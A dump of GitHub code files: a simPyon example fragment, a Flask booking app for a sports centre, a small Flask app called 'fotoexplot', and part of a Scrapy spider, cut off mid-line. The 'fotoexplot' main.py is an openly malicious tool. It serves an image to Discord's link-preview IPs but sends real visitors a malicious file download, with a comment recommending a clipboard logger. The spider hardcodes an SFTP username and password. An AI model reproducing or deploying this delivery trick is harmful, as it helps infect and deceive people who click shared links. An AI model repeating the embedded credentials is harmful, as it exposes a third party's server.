line_1[1]\n\n\t# Fly Particles with source line_1 and store in data_line_1\n\tdata_line_1 = imap.fly(10000).data\n\n\t# Change source location to line_2 and fly\n\timap.parts.pos.dist_vals['first'] = line_2[0]\n\timap.parts.pos.dist_vals['last'] = line_2[1]\n\tdata_line_2 = imap.fly(10000).data\n\n\t# Show Simion Geometry and last flown particles\n\timap.show()\n\t# enable measurement mode\n\timap.show(measure = True)\n\n\t# Plot distributions of flow data\n\tdata_line_2.show()\n\tdata_line_1.show()\n\nif __name__ =='__main__':\n\tmain()","repo_name":"jonbowr/simPyon","sub_path":"examples/sim_init.py","file_name":"sim_init.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"72118399451","text":"import datetime as dt\nfrom functools import reduce\n\nimport qrcode\nimport pdfkit\nfrom flask import render_template, 
redirect, url_for, flash, request\nfrom flask_login import login_required, current_user\n\nfrom . import main\nfrom .tables import ActivityTable, FacilityTable\nfrom .forms import *\nfrom ..models import *\nfrom .. import db\nfrom ..decorators import admin_required, permission_required\nfrom ..email import send_email\n\n\n@main.route('/')\ndef index():\n if current_user.is_administrator():\n return render_template('admin/index.html')\n return render_template('index.html')\n\n\n@main.route('/facility')\ndef facility():\n facilities = Facility.query.all()\n return render_template('facilities.html', facilities=facilities)\n\n\n@main.route('/facility_info/<int:id>')\ndef view_info(id):\n facility = Facility.query.filter_by(id=id).first()\n return render_template('facility_info.html', facility=facility)\n\n\n@main.route('/membership')\ndef view_membership_type():\n memberships = MembershipType.query.all()\n return render_template('membership.html', memberships=memberships)\n\n\n@main.route('/my_bookings/<int:id>')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_my_bookings(id):\n account = User.query.get_or_404(id)\n bookings = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).all()\n start_time = []\n end_time = []\n for booking in bookings:\n timetable = TimeManagement.query.filter_by(booking_id=booking.id).get()\n start_time.append(timetable.start_time)\n end_time.append(timetable.end_time)\n return render_template('my_booking.html', bookings=bookings)\n\n\n@main.route('/pricing_list')\ndef display_pricing_list():\n return render_template('pricing_list.html', facilities=Facility.query.all())\n\n\n@main.route('/activities/<int:id>/book', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_activity(id):\n form = BookActivityForm(activity=Activity.query.get(id))\n if form.validate_on_submit():\n return render_template('book_activity_instance.html', instance_id=form.activity_instance_id.data)\n return render_template('book_activity.html', form=form)\n\n\n@main.route('/activity-instances/<int:instance_id>/book', methods=['GET', 'POST'])\ndef book_activity_instance(instance_id):\n form = SelectPaymentForm(cards=current_user.cards)\n instance = ActivityInstance.query.get_or_404(instance_id)\n if form.validate_on_submit():\n booking = Booking(activity_instance_id=instance_id,\n status='Paid',\n user_id=current_user.id)\n db.session.add(booking)\n db.session.commit()\n return render_template('booking_success.html', booking=booking)\n return render_template('book_activity_instance.html', form=form, instance=instance)\n\n\n@main.route('/book/<int:type>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_facility(type):\n if type == 1:\n facility = \"Swimming pool\"\n form = PoolBookingForm()\n elif type == 2:\n facility = \"Fitness room\"\n form = FitnessBookingForm()\n elif type == 3:\n facility = \"Squash courts\"\n form = SquashBookingForm()\n else:\n facility = \"Sports hall\"\n form = HallBookingForm()\n\n if form.validate_on_submit():\n activity = form.activity.data\n number = form.number.data\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n payment = form.payment.data\n\n fac = Facility.query.filter_by(name=facility).first()\n act = fac.activities.query.filter_by(activity_name=activity).first()\n price = act.activity_price\n\n if end_time - start_time != 1:\n flash('You can only book a 1-hour session')\n return redirect(url_for('.book_facility', type=type))\n\n 
timetables = TimeManagement.query.filter_by(date=date).all()\n for timetable in timetables:\n if start_time == timetable.start_time:\n id = timetable.id\n\n timetable = TimeManagement.query.filter_by(id=id).get()\n\n if number + timetable.current_capacity > fac.capacity:\n flash('You have too many people!')\n return redirect(url_for('.book_facility', type=type))\n\n else:\n act.weekly_income = act.weekly_income + price\n act.weekly_usage = act.weekly_usage + number\n db.session.add(act)\n db.session.commit()\n\n booking = Booking(number=number,\n time_id=timetable.id,\n activity=activity,\n status=\"Unpaid\",\n payment=payment,\n fees=price)\n db.session.add(booking)\n db.session.commit()\n\n account = Account.query.filter_by(user_id=current_user.id).first()\n book = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).first_or_404()\n\n timetable.current_capacity = number + timetable.current_capacity\n db.session.add(timetable)\n db.session.commit()\n\n if payment == \"Credit Card\":\n flash('Pay for your booking.')\n return redirect(url_for('.handle_card_booking', book_id=book.id))\n elif payment == \"Cash\":\n flash('You will pay for your booking by cash.')\n return redirect(url_for('.index'))\n\n return render_template('book.html', form=form)\n\n\n'''\n@main.route('/book_season', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_regular():\n form = RegularBookForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n'''\n\n\n@main.route('/handle_card_booking/<int:book_id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_booking(book_id):\n account = Account.query.filter_by(user_id=current_user.id).first()\n card = CreditCardInfo.query.filter_by(account_id=account.id).first()\n book = Booking.query.filter_by(id=book_id).first()\n form = CardForm()\n\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n book.status = \"Paid\"\n db.session.add(book)\n db.session.commit()\n\n receipt = book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n'\n pdf_name = str(book.id) + '.pdf'\n pdfkit.from_string(receipt, pdf_name)\n\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n\n qr.add_data(\n book.activity + '\\n' + book.time.date + '\\n' + book.time.start_time + '~' + book.time.end_time + '\\n')\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', book=book, img=img)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_booking.html', book=book, form=form)\n\n\n@main.route('/bookings/<int:id>/cancel', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef cancel_booking(id):\n booking = Booking.query.get_or_404(id)\n 
form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(booking)\n db.session.commit()\n return redirect(url_for('.display_user_bookings'))\n return render_template('cancel_booking.html', form=form, booking=booking)\n\n\n@main.route('/pay_membership/<int:type_id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef pay_membership(type_id):\n membership_type = MembershipType.query.filter_by(id=type_id).get()\n account = Account.query.filter_by(user_id=current_user.id).first()\n form = PurchaseMembershipForm()\n if form.validate_on_submit():\n membership = Membership(title=form.title.data,\n status=\"Unpaid\",\n firstname=form.firstname.data,\n lastname=form.lastname.data,\n payment=form.payment.data,\n account_id=account.id,\n membership_type_id=membership_type.id\n )\n db.session.add(membership)\n db.session.commit()\n\n if (membership_type.length == 1):\n length = 30\n elif (membership_type.length == 3):\n length = 90\n else:\n length = 365\n membership.valueOfEnd_date(length)\n db.session.commit()\n\n flash('Thanks! You have become our membership!')\n return redirect(url_for('handle_card_membership', id=account.id))\n return render_template('pay_membership.html', form=form, membership_type=membership_type)\n\n\n@main.route('/handle_card_membership/<int:id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_membership(id):\n membership = Membership.query.filter_by(account_id=id).first()\n card = CreditCardInfo.query.filter_by(account_id=id).first()\n form = CardForm()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first()\n price = membership_type.id\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n membership.status = \"Paid\"\n db.session.add(membership)\n db.session.commit()\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', membership=membership)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_membership.html', price=price, form=form)\n\n\n@main.route('/configure_facility', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_facility():\n form = ConfigureFacilityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n capacity = form.capacity.data\n name = form.name.data\n url = form.url.data\n description = form.description.data\n\n if operation == \"add\":\n facility = Facility(name=name,\n url=url,\n capacity=capacity,\n description=description)\n db.session.add(facility)\n db.session.commit()\n flash('You have added the facility')\n\n elif operation == \"edit\":\n fac = Facility.query.filter_by(name=name).get()\n fac.capacity = capacity\n fac.url = url\n fac.description = description\n\n db.session.add(fac)\n db.session.commit()\n flash('You have edited the facility')\n\n elif operation == \"delete\":\n fac = Facility.query.filter_by(name=name).get()\n db.session.delete(fac)\n 
db.session.commit()\n flash('You have deleted the facility')\n\n return render_template('configure_facility.html', form=form)\n\n\n@main.route('/configure_activity', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_activity():\n form = ConfigureActivityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n facility = form.facility.data\n activity = form.activity.data\n price = form.price.data\n\n fac = Facility.query.filter_by(name=facility).get\n if operation == \"add\":\n act = Activity(weekly_income=0,\n weekly_usage=0,\n activity_price=price,\n activity_name=activity,\n facility_id=fac.id\n )\n db.session.add(act)\n db.session.commit()\n flash('You have added the activity')\n\n elif operation == \"edit\":\n act = Activity.query.filter_by(activity_name=activity).get()\n act.activity_price = price,\n act.activity_name = activity\n act.facility_id = fac.id\n\n db.session.add(act)\n db.session.commit()\n flash('You have edited the activity')\n\n elif operation == \"delete\":\n act = Activity.query.filter_by(activity_name=activity).get()\n db.session.delete(act)\n db.session.commit()\n flash('You have deleted the activity')\n\n return render_template('configure_activity.html', form=form)\n\n\n@main.route('/configure_timetable')\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_timetable():\n form = ConfigureTimetableForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n facility = form.facility.data\n\n fac = Facility.query.filter_by(name=facility).get()\n\n for i in range(start_time, end_time):\n timetable = TimeManagement(date=date,\n start_time=i,\n end_time=i + 1,\n facility_id=fac.id)\n db.session.add(timetable)\n db.session.commit()\n\n return render_template('configure_timetable.html', form=form)\n\n\n@main.route('/facilities')\ndef display_facilities():\n facilities = Facility.query.all()\n template = 'admin/facilities.html' if current_user.is_administrator() else 'facilities.html'\n return render_template(template, facilities=facilities)\n\n\n@main.route('/membership-types')\ndef display_membership_types():\n memberships = MembershipType.query.all()\n template = 'admin/membership_types.html' if current_user.is_administrator() else 'membership.html'\n return render_template(template, membership_types=memberships)\n\n\n@main.route('/membership-types/<int:type>/purchase', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef purchase_membership(type):\n membership_type = MembershipType.query.get_or_404(type)\n form = SelectPaymentForm(cards=current_user.cards)\n\n if form.validate_on_submit():\n membership = Membership(membership_type_id=type, user_id=current_user.id)\n db.session.add(membership)\n\n if form.payment_card.data == SelectPaymentForm.NEW_CARD_CHOICE[0]:\n card_form = form.new_payment_card\n new_card = CreditCardInfo(\n holder_name=card_form.cardholder_name.data,\n card_number=card_form.card_number.data,\n expire_month=card_form.expiry_date.expiry_month.data,\n expire_year=card_form.expiry_date.expiry_year.data,\n security_code=card_form.security_code.data,\n user_id=current_user.id\n )\n db.session.add(new_card)\n flash('Card successfully added to your account.')\n\n db.session.commit()\n flash('Thanks! 
You have successfully purchased a {} membership.'.format(membership_type.name))\n return redirect(url_for('main.index'))\n\n return render_template('pay_membership.html', membership_type=membership_type, form=form)\n\n\n@main.route('/my/bookings')\n@login_required\ndef display_user_bookings():\n return render_template('my_booking.html', bookings=current_user.bookings)\n\n\n@main.route('/my_card/<int:id>')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_cards(id):\n user = User.query.filter_by(id=id).first()\n cards = CreditCardInfo.query.filter_by(user_id=user.id).all()\n return render_template('my_card.html', cards=cards)\n\n\n@main.route('/my/membership')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_membership():\n membership = Membership.query.filter_by(user_id=current_user.id).first()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first() if membership else None\n return render_template('my_membership.html', membership=membership, membership_type=membership_type)\n\n\n@main.route('/timetable')\ndef timetable_all():\n date = request.args.get('date', default=datetime.today(), type=dt.datetime)\n end_of_day = datetime(\n year=date.year,\n month=date.month,\n day=date.day + 1,\n hour=0,\n minute=0,\n second=0\n )\n activity_instances = ActivityInstance.query \\\n .filter(ActivityInstance.start_time >= date, ActivityInstance.end_time < end_of_day) \\\n .order_by(ActivityInstance.start_time) \\\n .all()\n\n activity_instances_by_facility = {facility.name: [] for facility in Facility.query.all()}\n for instance in activity_instances:\n activity_instances_by_facility[instance.activity.facility.name].append(instance)\n\n return render_template('timetable_all.html', activity_instances=activity_instances_by_facility)\n\n\n@main.route('/facilities/<int:id>/timetable')\ndef timetable_facility(id):\n facility = Facility.query.get_or_404(id)\n activity_instances = reduce(list.__add__, [activity.instances.order_by(ActivityInstance.start_time).all() for activity in facility.activities.all()])\n return render_template('timetable_all.html', activity_instances={facility.name: activity_instances})\n\n\n# @main.route('/timetable_facility/<int:type>')\n# def timetable_facility(type):\n# if type == 1:\n# facility = \"Swimming pool\"\n# elif type == 2:\n# facility = \"Fitness room\"\n# elif type == 3:\n# facility = \"Squash courts\"\n# else:\n# facility = \"Sports hall\"\n#\n# facility = Facility.query.filter_by(name=facility).all()\n# today = dt.date.today()\n# day2 = today + dt.timedelta(days=1)\n# day3 = today + dt.timedelta(days=2)\n# day4 = today + dt.timedelta(days=3)\n# day5 = today + dt.timedelta(days=4)\n# timetable1 = TimeManagement.query.filter_by(start_time=today).all()\n# timetable2 = TimeManagement.query.filter_by(start_time=day2).all()\n# timetable3 = TimeManagement.query.filter_by(start_time=day3).all()\n# timetable4 = TimeManagement.query.filter_by(start_time=day4).all()\n# timetable5 = TimeManagement.query.filter_by(start_time=day5).all()\n# return render_template('timetable_facility.html', type=type + 1, today=today, day3=day3, day2=day2, day4=day4,\n# day5=day5, facility=facility, timetable1=timetable1, timetable2=timetable2,\n# timetable3=timetable3, timetable4=timetable4, timetable5=timetable5)\n\n\n@main.route('/my/membership/cancel', methods=['GET', 'POST'])\n@login_required\ndef cancel_membership():\n membership = current_user.membership\n if membership is None:\n return redirect(url_for('main.display_membership'))\n 
timedelta = membership.get_end_date() - dt.datetime.now()\n days_left = timedelta.days\n money_refund = 0.9 * (days_left / membership.membership_type.length) * membership.membership_type.price\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(membership)\n db.session.commit()\n flash('You have cancelled our membership!')\n return redirect(url_for('main.display_membership'))\n return render_template('cancel_membership.html', money_refund=money_refund, days_left=days_left,\n membership=membership, form=form)\n\n\n@main.route('/user/<username>')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n return render_template('user.html', user=user)\n\n\n@main.route('/search_booking')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_booking():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.email.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_bookings', id=user.id))\n return render_template('search_booking.html', form=form)\n\n\n@main.route('/search_membership')\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_membership():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.email.data\n\n user = User.query.filter_by(email=email).get()\n return redirect(url_for('display_membership', id=user.id))\n return render_template('search_membership.html', form=form)\n\n\n@main.route('/view_income')\n@login_required\n@permission_required(Permission.VIEW_BUSINESS)\ndef view_income():\n \"\"\"income_facility1 = 0\n income_facility2 = 0\n income_facility3 = 0\n income_facility4 = 0\n\n today = datetime.date.today()\n day1 = today - datetime.timedelta(days=1)\n day2 = today - datetime.timedelta(days=2)\n day3 = today - datetime.timedelta(days=3)\n day4 = today - datetime.timedelta(days=4)\n day5 = today - datetime.timedelta(days=5)\n day6 = today - datetime.timedelta(days=6)\n\n timetable1 = Time_management.query.filter_by(date=today).all()\n timetable2 = Time_management.query.filter_by(date=day1).all()\n timetable3 = Time_management.query.filter_by(date=day2).all()\n timetable4 = Time_management.query.filter_by(date=day3).all()\n timetable5 = Time_management.query.filter_by(date=day4).all()\n timetable6 = Time_management.query.filter_by(date=day5).all()\n timetable7 = Time_management.query.filter_by(date=day6).all()\n\n for timetable in timetable1:\n if timetable.facility == 1:\n booking = Booking.query.filter_by(id=timetable.booking_id).get()\n income_facility1 += booking.fees\n\"\"\"\n overall_income = 0\n overall_usage = 0\n activities = Activity.query.all()\n for activity in activities:\n overall_income += activity.weekly_income\n overall_usage += activity.weekly_usage\n return render_template('business.html', overall_income=overall_income,\n overall_usage=overall_usage, activities=activities)\n\n\n@admin_required\n@main.route('/users')\ndef display_users():\n return render_template('admin/users.html', users=User.query.all())\n\n\n@admin_required\n@main.route('/users/new', methods=['GET', 'POST'])\ndef add_user():\n form = EditUserForm()\n if form.validate_on_submit():\n user = User(email=form.email.data.lower(),\n username=form.username.data,\n password=form.password.data,\n role_id=form.role.data.id)\n db.session.add(user)\n db.session.commit()\n flash('User successfully added to database.')\n return redirect(url_for('.display_users'))\n return render_template('admin/edit_user.html', 
form=form)\n\n\n@admin_required\n@main.route('/activity-instances')\ndef display_activity_instances():\n return render_template('admin/activity_instances.html', activity_instances=ActivityInstance.query.all())\n\n\n@admin_required\n@main.route('/activity-instances/new', methods=['GET', 'POST'])\ndef add_activity_instance():\n form = EditActivityInstanceForm()\n if form.validate_on_submit():\n instance = ActivityInstance(\n start_time=form.start_time.data,\n end_time=form.end_time.data,\n activity_id=form.activity_id.data,\n court_id=form.court_id.data\n )\n db.session.add(instance)\n db.session.commit()\n flash('Activity instance successfully added to database.')\n return redirect(url_for('.display_activity_instances'))\n return render_template('admin/edit_activity_instance.html', form=form)\n\n\n@admin_required\n@main.route('/memberships')\ndef display_memberships():\n return render_template('admin/memberships.html', memberships=Membership.query.all())\n\n\n@admin_required\n@main.route('/memberships/new', methods=['GET', 'POST'])\ndef add_membership():\n form = EditMembershipForm()\n if form.validate_on_submit():\n membership = Membership(\n membership_type_id=form.membership_type_id.data,\n user_id=form.user_id.data\n )\n db.session.add(membership)\n db.session.commit()\n flash('Membership successfully added to database.')\n return redirect(url_for('.display_memberships'))\n return render_template('admin/edit_membership.html', form=form)\n\n\n@admin_required\n@main.route('/activities')\ndef display_activities():\n return render_template('admin/activities.html', activities=Activity.query.all())\n\n\n@admin_required\n@main.route('/bookings')\ndef display_bookings():\n return render_template('admin/bookings.html', bookings=Booking.query.all())\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n\n@main.route('/facilities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_facility():\n form = EditFacilityForm()\n if form.validate_on_submit():\n facility 
= Facility(name=form.name.data,\n capacity=form.capacity.data,\n description=form.description.data)\n db.session.add(facility)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_facilities'))\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n@main.route('/activities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_activity():\n form = EditActivityForm()\n if form.validate_on_submit():\n activity = Activity(activity_staff_id=form.activity_staff_id.data,\n activity_price=form.activity_price.data,\n activity_name=form.activity_name.data,\n facility_id=form.facility_id.data)\n db.session.add(activity)\n db.session.commit()\n flash('Activity has been added to Database')\n return redirect(url_for('.display_activities'))\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n@main.route('/membership-types/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_membership_type():\n form = EditMembershipTypeForm()\n if form.validate_on_submit():\n membership_type = MembershipType(name=form.name.data, length=form.length.data, price=form.price.data)\n db.session.add(membership_type)\n db.session.commit()\n flash('Membership type has been added to database')\n return redirect(url_for('.display_membership_types'))\n return render_template('admin/edit_membership_type.html', form=form)\n\n\n@main.route('/membership-types/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_membership_type(id):\n mtype = MembershipType.query.get_or_404(id)\n form = EditMembershipTypeForm()\n\n if form.validate_on_submit():\n mtype.name = form.name.data\n mtype.length = form.length.data\n mtype.price = form.price.data\n\n db.session.commit()\n flash('Membership type successfully updated!')\n return redirect('/')\n\n form.name.data = mtype.name\n form.length.data = mtype.length\n form.price.data = mtype.price\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each facility to reach id before calling this method\n@main.route('/facilities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_facility(id):\n facility = Facility.query.get_or_404(id)\n form = EditFacilityForm()\n\n if form.validate_on_submit():\n facility.name = form.name.data\n facility.capacity = form.capacity.data\n facility.description = form.description.data\n\n db.session.commit()\n flash('Facility successfully updated!')\n return redirect('/')\n\n form.name.data = facility.name\n form.capacity.data = facility.capacity\n form.description.data = facility.description\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each activity to reach id before calling this method\n@main.route('/activities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_activity(id):\n activity = Activity.query.get_or_404(id)\n form = EditActivityForm()\n\n if form.validate_on_submit():\n activity.activity_name = form.activity_name.data\n activity.activity_staff_id = form.activity_staff_id.data\n activity.activity_price = form.activity_price.data\n activity.facility_id = form.facility_id.data\n\n db.session.commit()\n flash('Activity successfully updated!')\n return redirect(url_for('.display_activities'))\n\n form.activity_name.data = activity.activity_name\n form.activity_staff_id.data = activity.activity_staff_id\n form.activity_price.data = 
activity.activity_price\n    form.facility_id.data = activity.facility_id\n\n    return render_template('admin/edit_activity.html', form=form)\n\n\n# Display method to display the list of activities to get to the edit function\n@main.route('/activities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_activity(id):\n    activities = db.session.query(Activity).all()\n\n    if not activities:\n        flash('No results found!')\n        return redirect('/')\n    else:\n        table = ActivityTable(activities)\n        table.border = True\n        return render_template('admin/display_activity.html', table=table)\n\n\n@main.route('/facilities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_facility(id):\n    facilities = db.session.query(Facility).all()\n\n    if not facilities:\n        flash('No results found!')\n        return redirect('/')\n    else:\n        table = FacilityTable(facilities)\n        table.border = True\n        return render_template('admin/display_facility.html', table=table)\n","repo_name":"HollowMan6/Answers-for-My-Leeds-COMP2-Courses","sub_path":"COMP2913/Master/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"25062752113","text":"import requests, io\nfrom flask import Flask, request, send_file\napp = Flask(\n__name__,\n    template_folder='templates',\n    static_folder='static'\n)\n@app.route('/', methods=['GET'])\ndef main():\n    Image = 'https://e7.pngegg.com/pngimages/193/384/png-clipart-panda-panda.png' # Replace this with your image link\n    Malicious = 'MaliciousFIleDownloadLink'# Replace this with your download link\n    Redirect = \"RedirectLink\" # You can just put the image here or you can put a custom site. You can combine this with my clipboard logger and it'll be more op lol https://github.com/TheonlyIcebear/Clipboard-Javascript-Logger\n    # This is to get the ip\n    if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n        ip = request.environ['REMOTE_ADDR']\n    else:\n        ip = request.environ['HTTP_X_FORWARDED_FOR']\n    print(ip)\n    if ip.startswith('35.') or ip.startswith('34.'):\n        # If discord is getting a link preview send a image\n        return send_file(\n            io.BytesIO(requests.get(Image).content),\n            mimetype='image/jpeg',\n            download_name='AnyName.png')\n    else:\n        # If a real person is clicking the link send a malicious file and redirect back to the image\n        return f'''\n            '''+'''\n            ''' # If the file doesn't download change the 500 to a higher number like 1000\nif __name__ == '__main__':\n    # Run the Flask app\n    app.run(\n        host='0.0.0.0',\n        debug=True,\n        port=8080\n    )\n","repo_name":"MematiBaskann/fotoexplot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"20538059317","text":"\"\"\"\nOriginal ticket: https://www.assembla.com/spaces/competitormonitor/tickets/3926-express-gifts---spider-copy---dunelm#/activity/ticket:\nThis spider was copied from the Lakeland account\nThis spider downloads the csv file and extracts the products from the URLs.\nThe identifier/SKU is set from the CSV file.\n\"\"\"\nimport csv\nimport json\nimport re\nfrom tempfile import NamedTemporaryFile\nimport os\n\nimport paramiko\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom urlparse import urljoin\n\nfrom 
product_spiders.items import Product, ProductLoaderWithoutSpaces as ProductLoader\nfrom product_spiders.config import CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DunelmSpider(BaseSpider):\n name = 'expressgifts-dunelm.com'\n allowed_domains = ['dunelm.com']\n start_urls = ['http://www.dunelm.com']\n\n def parse(self, response):\n transport = paramiko.Transport((CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT))\n username = \"expressgifts\"\n password = \"jqh3aMrK\"\n transport.connect(username = username, password = password)\n sftp = paramiko.SFTPClient.from_transport(transport)\n files = sftp.listdir_attr()\n \n f = NamedTemporaryFile(delete=True, suffix='.csv', prefix='expressgifts_dunelm_')\n sftp.get('express_gifts_flat_file.csv', f.name)\n\n with open(f.name) as csv_f:\n rows = csv.DictReader(csv_f)\n for row in rows:\n if row.get('DUNELM').strip():\n yield Request(row['DUNELM'].strip(), callback=self.parse_product,\n meta={'sku': row['PRODUCT_NUMBER']})\n\n f.close()\n \n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n \n loader = ProductLoader(selector=hxs, item=Product())\n loader.add_value('url', response.url)\n loader.add_xpath('brand', './/dt[text()=\"Brand\"]/following-sibling::dd[1]/text()')\n categories = hxs.select('.//div[contains(@class, \"breadcrumbs\")]//a/text()').extract()\n for category in categories:\n if 'search' in category.lower():\n continue\n loader.add_value('category', category)\n loader.add_value('sku', response.meta.get('sku', ''))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n if hxs.select('//article[@id=\"product\"]'):\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.replace_value('image_url', urljoin(base_url, image_url[0]))\n options = hxs.select('//script[@type=\"text/javascript\"]/text()[contains(., \"productData\")]').extract()\n for item in self.parse_options(hxs, base_url, loader, options):\n yield item\n \n for product in hxs.select('//article[@class=\"bdp-item\"]'):\n image_url = product.select('.//a[contains(@id, \"mainImage\")]/img/@src').extract()[0]\n loader.replace_value('image_url', urljoin(base_url, image_url))\n options = product.select('./div/div[1]//script[@type=\"text/javascript\"]/text()').extract()\n for item in self.parse_options(product, base_url, loader, options):\n yield item\n \n def parse_one_product(self, hxs, base_url, loader):\n if options:\n self.log('Options detected on %s' %loader.get_collected_values('url'))\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n loader.add_xpath('identifier', './/article[@id=\"product\"]/@data-product-id')\n loader.add_xpath('sku', './/article[@id=\"product\"]/@data-product-id')\n \n if not hxs.select('.//div[contains(@id, \"stock\")]//text()[contains(.,\"in-stock\")]') and hxs.select('//span[contains(@id, \"standardIcon\")]/@class[.=\"icon availability 